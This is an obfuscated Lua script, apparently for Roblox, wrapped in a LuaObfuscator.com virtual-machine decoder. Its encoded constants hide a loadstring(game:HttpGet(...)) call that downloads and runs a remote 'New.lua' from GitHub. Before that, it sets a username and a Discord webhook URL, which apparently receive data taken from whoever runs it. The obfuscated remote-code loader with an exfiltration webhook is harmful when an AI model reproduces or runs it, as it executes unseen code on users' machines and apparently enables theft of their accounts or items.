--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v74=v2(v0(v20,16));if v19 then local v78=v5(v74,v19);v19=nil;return v78;else return v74;end end end);local function v21(v22,v23,v24)if v24 then local v75=(v22/((2 -0)^(v23-(3 -2))))%((2 + 0)^(((v24-1) -(v23-(1 + 0))) + (1 -0))) ;return v75-(v75%(511 -(156 + 354))) ;else local v76=(2968 -(439 + 566)) -(1456 + 507) ;local v77;while true do if (v76==((885 -(520 + 365)) -0)) then v77=(3 -1)^(v23-(1 + 0)) ;return (((v22%(v77 + v77))>=v77) and (1 -0)) or (663 -(420 + 243)) ;end end end end local function v25()local v38=v1(v16,v18,v18);v18=v18 + 1 ;return v38;end local function v26()local v39,v40=v1(v16,v18,v18 + (6 -4) );v18=v18 + 2 ;return (v40 * (457 -(109 + 92))) + v39 ;end local function v27()local v41=0 + 0 ;local v42;local v43;local v44;local v45;while true do if (v41==(1 + 0 + 0 + 0)) then return (v45 * ((15940302 + 837223) -(242 + 67))) + (v44 * 65536) + (v43 * (250 + 6)) + v42 ;end if (v41==0) then v42,v43,v44,v45=v1(v16,v18,v18 + 1 + 2 );v18=v18 + (1040 -(9 + 1027)) ;v41=3 -2 ;end end end local function v28()local v46=0;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (0==v46) then v47=v27();v48=v27();v46=1;end if (v46==((997 -(67 + 921)) -6)) then if (v51==(0 -0)) then if (v50==(0 -0)) then return v52 * (455 -(157 + 298)) ;else local v97=0;while true do if ((0 + 0)==v97) then v51=2 -1 ;v49=0 + 0 ;break;end end end elseif (v51==(2801 -(461 + 293))) then return ((v50==((524 -175) -(118 + 195 + 36))) and (v52 * ((1 + 0)/(0 + 0)))) or (v52 * NaN) ;end return v8(v52,v51-(664 + 359) ) * (v49 + (v50/((2 -0)^52))) ;end if ((1317 -(118 + 416 + 120 + 662))==v46) then v49=1 + 0 ;v50=(v21(v48,2 -1 ,13 + 7 ) * ((1244 -(720 + 522))^32)) + v47 ;v46=507 -(115 + 390) ;end if (v46==(8 -6)) then v51=v21(v48,6 + 15 ,561 -(260 + 270) );v52=((v21(v48,71 -(1266 -(365 + 862)) )==1) and  -(482 -(442 + 39))) or 1 ;v46=1151 -(475 + 673) ;end end end local function v29(v30)local v53;if  not v30 then v30=v27();if (v30==0) then return "";end end v53=v3(v16,v18,(v18 + v30) -(2 -1) );v18=v18 + v30 ;local v54={};for v65=1 -0 , #v53 do v54[v65]=v2(v1(v3(v53,v65,v65)));end return v6(v54);end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v55=815 -(445 + 370) ;local v56;local v57;local v58;local v59;local v60;local v61;while true do local v67=0 + 0 ;while true do if (v67~=0) then else if (v55==(2 -1)) then local v89=0;while true do if (v89~=0) then else v60=v27();v61={};v89=1;end if (v89==(4 -3)) then for v104=1 + 0 ,v60 do local v105=1834 -(714 + 1120) ;local v106;local v107;while true do if (v105~=(1 -0)) then else if (v106==1) then v107=v25()~=0 ;elseif (v106==(1894 -(962 + 930))) then v107=v28();elseif (v106~=(1439 -(950 + 486))) then else v107=v29();end v61[v104]=v107;break;end if (v105==0) then v106=v25();v107=nil;v105=1;end end end v59[7 -4 ]=v25();v89=2;end if (v89==2) then v55=2;break;end end end if (v55==(552 -(133 + 417))) then local v90=0;while true do if (v90~=1) then else for v108=1589 -(488 + 1100) ,v27() do v58[v108]=v27();end return v59;end if ((0 -0)==v90) then for v110=1 + 0 ,v27() do local v111=0 + 0 ;local v112;local v113;local v114;while true do if ((0 + 0)==v111) then v112=0 -0 ;v113=nil;v111=1;end if (v111~=(1242 -(1033 + 208))) then else v114=nil;while true do if (v112~=1) then else while true do if (v113~=(1905 -(906 + 999))) then else v114=v25();if (v21(v114,1,1)~=0) then else local v141=0 + 0 ;local v142;local v143;local v144;local v145;while true do if (v141==(1163 -(514 + 647))) then while true do if (v142~=2) then else local v162=0;local v163;local v164;while true do if (v162==(1937 -(508 + 1428))) then while true do if (v163==(0 -0)) then v164=0 -0 ;while true do if (v164==0) then local v176=0;local v177;while true do if (v176~=0) then else v177=0;while true do if (v177==1) then v164=1537 -(356 + 1180) ;break;end if (v177~=(0 -0)) then else if (v21(v144,1301 -(602 + 698) ,1 + 0 )~=1) then else v145[2]=v61[v145[1903 -(249 + 1652) ]];end if (v21(v144,2,2)==1) then v145[1 + 2 ]=v61[v145[6 -3 ]];end v177=2 -1 ;end end break;end end end if (v164~=(3 -2)) then else v142=2 + 1 ;break;end end break;end end break;end if (0==v162) then v163=0;v164=nil;v162=999 -(952 + 46) ;end end end if (1==v142) then local v165=0;local v166;local v167;while true do if (v165~=0) then else v166=0 + 0 ;v167=nil;v165=1;end if (v165~=1) then else while true do if (v166==(0 -0)) then v167=977 -(899 + 78) ;while true do if (v167==1) then v142=2;break;end if (v167==0) then local v178=817 -(260 + 557) ;local v179;while true do if (v178==(0 -0)) then v179=0;while true do if (v179==(0 -0)) then v145={v26(),v26(),nil,nil};if (v143==(0 + 0)) then local v184=0;local v185;while true do if (v184~=0) then else v185=1770 -(103 + 1667) ;while true do if (v185~=(0 + 0)) then else v145[8 -5 ]=v26();v145[4]=v26();break;end end break;end end elseif (v143==(1 -0)) then v145[428 -(219 + 206) ]=v27();elseif (v143==2) then v145[3]=v27() -(2^16) ;elseif (v143==3) then local v190=0 + 0 ;local v191;local v192;while true do if (v190~=1) then else while true do if (v191~=(0 -0)) then else v192=0;while true do if (v192==(0 + 0)) then v145[2 + 1 ]=v27() -((1032 -(613 + 417))^16) ;v145[4]=v26();break;end end break;end end break;end if ((119 -(43 + 76))==v190) then v191=0;v192=nil;v190=3 -2 ;end end end v179=1;end if (v179==(534 -(155 + 378))) then v167=1;break;end end break;end end end end break;end end break;end end end if (v142==3) then if (v21(v144,3,1017 -(428 + 586) )~=1) then else v145[2 + 2 ]=v61[v145[2 + 2 ]];end v56[v110]=v145;break;end if (v142==0) then local v169=1271 -(1033 + 238) ;while true do if (v169==(0 -0)) then v143=v21(v114,2,1988 -(761 + 1224) );v144=v21(v114,9 -5 ,6);v169=1;end if (v169==(1 + 0)) then v142=1;break;end end end end break;end if (v141==(609 -(230 + 379))) then local v148=491 -(75 + 416) ;while true do if (v148~=(247 -(100 + 147))) then else v142=0;v143=nil;v148=2 -1 ;end if (v148==1) then v141=1 + 0 ;break;end end end if (v141~=1) then else local v149=986 -(328 + 658) ;while true do if (0~=v149) then else v144=nil;v145=nil;v149=1;end if (1==v149) then v141=2 + 0 ;break;end end end end end break;end end break;end if (v112~=0) then else v113=1256 -(867 + 389) ;v114=nil;v112=1;end end break;end end end for v115=1 + 0 ,v27() do v57[v115-(1 -0) ]=v33();end v90=1 + 0 ;end end end v67=1;end if (v67~=1) then else if (v55~=0) then else local v91=0 + 0 ;while true do if (1==v91) then v58={};v59={v56,v57,nil,v58};v91=1 + 1 ;end if (v91~=(3 -1)) then else v55=1 + 0 ;break;end if (v91~=0) then else local v103=1400 -(58 + 1342) ;while true do if (v103==(815 -(673 + 142))) then v56={};v57={};v103=4 -3 ;end if (v103==(1 + 0)) then v91=1 + 0 ;break;end end end end end break;end end end end local function v34(v35,v36,v37)local v62=v35[1];local v63=v35[2];local v64=v35[3];return function(...)local v68=0;local v69;local v70;local v71;local v72;local v73;while true do if (v68==2) then v73=nil;v73=function()local v79=v62;local v80=v63;local v81=v64;local v82=v32;local v83={};local v84={};local v85={};for v92=0 + 0 ,v72 do if (((1162 + 175)<(10053 -6490)) and (v92>=v81)) then v83[v92-v81 ]=v71[v92 + 1 + 0 ];else v85[v92]=v71[v92 + (749 -(28 + 720)) + 0 ];end end local v86=(v72-v81) + 1 + (0 -0) ;local v87;local v88;while true do local v93=0 -0 ;local v94;while true do if ((((8077 -4817) -(1082 + 210))<=(8291 -(4795 + 419))) and (v93==(1417 -(843 + 574)))) then v94=1340 -(174 + 1166) ;while true do if (((337 + 98)<((70705 -52613) -14114)) and (v94==(679 -(328 + 350)))) then if (((2942 -(49 + (428 -157)))>=554) and (v88<=(1 + 3))) then if (((965 + 2142)>=((1757 -(252 + 237)) + 1128)) and (v88<=((1 + 0) -0))) then if (((2649 + 2041)==(4820 -(125 + 3 + 2))) and (v88==(0 -0))) then v85[v87[1 + 1 ]]=v87[1 + 2 ];else v85[v87[5 -3 ]]=v37[v87[7 -4 ]];end elseif ((v88<=(8 -6)) or ((4387 -(511 + 110))<=(2720 -(731 + 45)))) then v69=v87[1817 -(1334 + 480) ];elseif (((1185 + (447 -224))>(983 + 2)) and (v88==3)) then if ((v85[v87[1726 -((2948 -1836) + 612) ]]==v87[4 + 0 ]) or ((2584 -(10 + 11))==((539 + 3970) -2091))) then v69=v69 + (1922 -(892 + 1029)) ;else v69=v87[11 -(21 -13) ];end else local v135=0 -0 ;local v136;local v137;local v138;while true do if (((3913 -2825)<(10707 -7346)) and ((1 + 0)==v135)) then v138=nil;while true do if ((v136==(412 -(338 + 74))) or ((3617 -(1382 + 676))>=(2806 + 1079))) then local v158=1076 -(708 + 368) ;while true do if ((v158==(3 -2)) or (((17367 -12503) -(28 + 262))==(9097 -7252))) then v136=(47 + 659) -(139 + 566) ;break;end if (((30 + 662)>(1557 -(894 + (2279 -1742)))) and (v158==(1507 -(840 + 667)))) then v137=v87[2 + 0 ];v138=v85[v87[2 + 1 ]];v158=2 -1 ;end end end if ((v136==(1055 -(267 + 787))) or ((6500 -(612 + 1033))<((6907 -(381 + 1599)) -(490 + 832)))) then v85[v137 + (4 -3) ]=v138;v85[v137]=v138[v87[1 + 3 ]];break;end end break;end if ((v135==(0 + 0)) or ((4023 + 921)<=(3035 + 1081))) then v136=0 -0 ;v137=nil;v135=(6338 -4476) -(354 + 1507) ;end end end elseif ((v88<=(16 -10)) or ((177 + 3040)>=(3112 + 629))) then if ((v88==(6 -1)) or ((3015 -(65 + 29))>(476 + 3443))) then local v126=0 + 0 ;local v127;local v128;while true do if ((772<(15413 -11096)) and (v126==(1 + 0))) then while true do if ((v127==(0 -(326 -(234 + 92)))) or ((1895 -(253 + 1066))==(700 + 86))) then v128=v87[1 + 1 ];v85[v128]=v85[v128](v13(v85,v128 + 1 + 0 ,v70));break;end end break;end if (((10564 -7646)>=(1564 -(57 + (1105 -(365 + 567))))) and (v126==(1621 -(1577 + 44)))) then local v146=1276 -(428 + 848) ;while true do if ((v146==(1 + 0)) or ((4748 -(181 + 80))<=(2858 -(1032 + 202)))) then v126=327 -(31 + 295) ;break;end if ((v146==(0 -0)) or ((6013 -3122)==(5001 -(172 + 66)))) then v127=0 -0 ;v128=nil;v146=1;end end end end else local v129=1534 -(543 + (2248 -(880 + 377))) ;local v130;local v131;local v132;local v133;local v134;while true do if ((v129==(1 + 0)) or ((59 + 167)>(5823 -(1554 + 371)))) then v132=nil;v133=nil;v129=2 + 0 ;end if (((4747 -(1140 + 268))>=(159 -86)) and (v129==(0 -0))) then v130=0 -0 ;v131=nil;v129=1716 -(380 + 1335) ;end if (((16022 -12535)==(11144 -7657)) and (v129==(99 -(85 + 12)))) then v134=nil;while true do if ((v130==(0 + (0 -0))) or ((2741 -1523)>=(268 + 1023))) then v131=v87[2 -(1379 -(527 + 852)) ];v132,v133=v82(v85[v131](v13(v85,v131 + (1302 -(942 + 359)) ,v87[1 + 0 + (215 -(9 + 204)) ])));v130=1 + 0 ;end if (((1 + 0)==v130) or ((10987 -6029)<(1566 + 2988))) then local v153=0 -0 ;while true do if ((v153==(0 -0)) or ((683 -450)>=(4312 -(685 + (2520 -(427 + 1004)))))) then v70=(v133 + v131) -(794 -(96 + 697)) ;v134=(1519 -(1057 + 462)) + (0 -0) ;v153=2 -1 ;end if ((v153==(1 + 0)) or ((14710 -10897)<=(961 + 849))) then v130=1 + (446 -(187 + 258)) ;break;end end end if (((14033 -10841)>(3031 -(246 + 228))) and ((2 + 0)==v130)) then for v154=v131,v70 do local v155=0 -0 ;local v156;local v157;while true do if ((v155==(2 -1)) or ((949 + 1674)<=(4012 -(338 + 1134)))) then while true do if ((v156==(489 -(399 + 90))) or (2590>(842 + 1911))) then v157=0;while true do if ((v157==(0 + 0)) or ((4721 -(168 + 1423))<=(754 + 588))) then v134=v134 + 1 + 0 ;v85[v154]=v132[v134];break;end end break;end end break;end if ((v155==(1245 -(1066 + 179))) or ((8171 -4227)<=((275 -(86 + 71)) -73))) then v156=0;v157=nil;v155=1 -0 ;end end end break;end end break;end end end elseif (((1789 -(10 + 19 + 156))<=(3485 -(521 + 205))) and (v88<=(1742 -(1494 + 241)))) then v85[v87[1 + 1 ]]();elseif (((2474 -(471 + 159))>(2348 -1496)) and (v88==(910 -(152 + 750)))) then do return;end else v37[v87[167 -(27 + 137) ]]=v85[v87[1 + 1 ]];end v69=v69 + (1629 -(787 + 841)) ;break;end if ((v94==(0 + 0)) or (((13570 + 3067) -12038)>(1771 + 3188))) then local v117=0 -0 ;while true do if (((3793 -(226 + 438))<(1651 + 2600)) and ((1 -(0 + 0))==v117)) then v94=3 -2 ;break;end if ((v117==(0 -0)) or ((695 -(783 -383))>=(967 + 922))) then v87=v79[v69];v88=v87[1551 -(1455 + 95) ];v117=2 -1 ;end end end end break;end end end end;v68=3;end if (v68==0) then v69=1;v70= -1;v68=1;end if (v68==3) then A,B=v32(v11(v73));if  not A[1] then local v95=0;local v96;while true do if (v95==0) then v96=v35[4][v69] or "?" ;error("Script error at ["   .. v96   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end break;end if (v68==1) then v71={...};v72=v12("#",...) -1 ;v68=2;end end end;end return v34(v33(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F72692O7A6875622F6D61696E2F4E65772E6C756103083O00557365724E616D6503073O006B616A6174595403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313038313931373339342O3836333438392O312F6D46456D6732584465454642466B32446C2O3249724147747557614C75656A31496351635A32486555334C692O425531664768626E6D466A465A6F67494D374865577A3700143O00124O00013O0026033O000B000100020004023O000B0001001201000100033O001201000200043O00200400020002000500122O000400064O0006000200044O000500013O00022O00070001000100010004023O001300010026033O0001000100010004023O0001000100122O000100083O001209000100073O00122O0001000A3O001209000100093O00124O00023O0004023O000100012O00083O00017O00143O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
